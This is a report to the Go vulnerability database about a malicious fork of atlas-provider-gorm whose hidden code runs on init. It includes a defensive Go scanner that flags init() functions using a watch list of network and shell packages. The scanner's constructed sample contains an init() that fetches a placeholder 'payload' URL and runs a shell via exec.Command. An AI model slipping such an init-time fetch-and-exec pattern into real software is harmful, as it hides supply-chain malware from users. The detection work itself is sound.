Acknowledgement
- The maintainer(s) of the affected project have already been made aware of this vulnerability.
Description
In the #modules channel in Gopher Slack, someone pointed to this Twitter thread:
https://x.com/arielmashraki/status/1900974934144188854
According to that Twitter thread:
- https://github.com/readyrevena/atlas-provider-gorm has malicious code
- https://github.com/ariga/atlas-provider-gorm is the real repo, and the malicious repo is mostly a copy + the malicious code
At first glance, the Twitter thread appears to be from @a8m, who seems to have 2 commits at https://github.com/ariga/atlas-provider-gorm/graphs/contributors.
@a8m, can you comment or confirm? Also, do you already have something in-flight for reporting this elsewhere (in which case maybe this issue can be closed).
Copying in some quotes from the Twitter thread:
One of the providers we offer for Atlas is the provider for GORM, a widely used ORM in the Go community. Our repo is: http://github.com/ariga/atlas-provider-gorm
Then we found this: someone copied it, faked stars for credibility from accounts created just a few weeks ago: http://github.com/readyrevena/atlas-provider-gorm
Something felt off.
At first glance, the code looked the same, but after digging deeper, I found malicious code hidden inside, designed to execute on init.
This isn't just our project. I checked some of the fake stargazers, and it looks like other repos were hit too. http://github.com/ourspiral/href-counter/blob/master/app.go#L97-L106
I immediately searched on GitHub to check how many repos were affected, but nothing showed up. The attacker knows what they are doing.
Affected Modules, Packages, Versions and Symbols
Module: github.com/readyrevena/atlas-provider-gorm
Versions:
- Introduced: 0.0.0
CVE/GHSA ID
No response
Fix Commit or Pull Request
No response
References
No response
Additional information
No response
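The thread above describes a forked module whose malicious code runs "on init", which in Go means an init() function that executes as soon as any program imports the package. A reviewer triaging a suspicious fork can look for exactly that pattern. The following is an added example for this report, not code from either repository named above: it parses a Go source file with go/parser and flags every init() that calls into a small, assumed list of packages (os/exec, net/http, net, syscall). The sample source it scans is constructed for the example; the package name and the URL in it are placeholders.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"sort"
	"strings"
)

// Constructed sample source for this example (not from any real repository):
// an ordinary-looking package whose init() reaches for net/http and os/exec.
const sampleSource = `package gormschema

import (
	"net/http"
	"os/exec"
	"strings"
)

func Load() string { return strings.TrimSpace("ok") }

func init() {
	resp, err := http.Get("http://example.invalid/payload")
	if err != nil {
		return
	}
	defer resp.Body.Close()
	exec.Command("sh", "-c", "echo hi").Run()
}

func helper() { exec.Command("ls").Run() }
`

// watchedPackages is an assumed, deliberately short list of import paths whose
// use from within init() deserves a manual look; extend it for your own review.
var watchedPackages = map[string]bool{
	"os/exec": true, "net/http": true, "net": true, "syscall": true,
}

// InitFinding records one init() function and the watched packages it calls.
type InitFinding struct {
	File     string
	Line     int
	Packages []string // import paths, sorted for stable output
}

// ScanSource parses one Go file and returns a finding for each init() whose
// body references a watched package through its imported name.
func ScanSource(filename, src string) ([]InitFinding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	// Map the local name of each import (alias or last path element) to its path.
	importsByName := map[string]string{}
	for _, imp := range f.Imports {
		path := strings.Trim(imp.Path.Value, `"`)
		name := path[strings.LastIndex(path, "/")+1:]
		if imp.Name != nil {
			name = imp.Name.Name
		}
		importsByName[name] = path
	}
	var findings []InitFinding
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		// Only top-level func init() bodies matter; methods and other funcs are skipped.
		if !ok || fn.Name.Name != "init" || fn.Recv != nil || fn.Body == nil {
			continue
		}
		seen := map[string]bool{}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			sel, ok := n.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			ident, ok := sel.X.(*ast.Ident) // pkg.Func form, e.g. exec.Command
			if !ok {
				return true
			}
			if path, found := importsByName[ident.Name]; found && watchedPackages[path] {
				seen[path] = true
			}
			return true
		})
		if len(seen) == 0 {
			continue
		}
		pkgs := make([]string, 0, len(seen))
		for p := range seen {
			pkgs = append(pkgs, p)
		}
		sort.Strings(pkgs)
		findings = append(findings, InitFinding{
			File:     filename,
			Line:     fset.Position(fn.Pos()).Line,
			Packages: pkgs,
		})
	}
	return findings, nil
}

func main() {
	findings, err := ScanSource("sample.go", sampleSource)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s:%d init() calls into %s\n", f.File, f.Line, strings.Join(f.Packages, ", "))
	}
}
```

This is a review aid, not a verdict: a hit means "read this init() by hand", and an empty result does not clear a package, since code can be reached indirectly or through a package the list does not name. For a real fork comparison, run it over every file that differs from the upstream repository rather than over a single sample.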